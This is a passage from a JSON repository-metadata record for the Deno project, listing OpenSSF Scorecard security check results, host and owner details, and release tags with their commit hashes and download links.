source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifes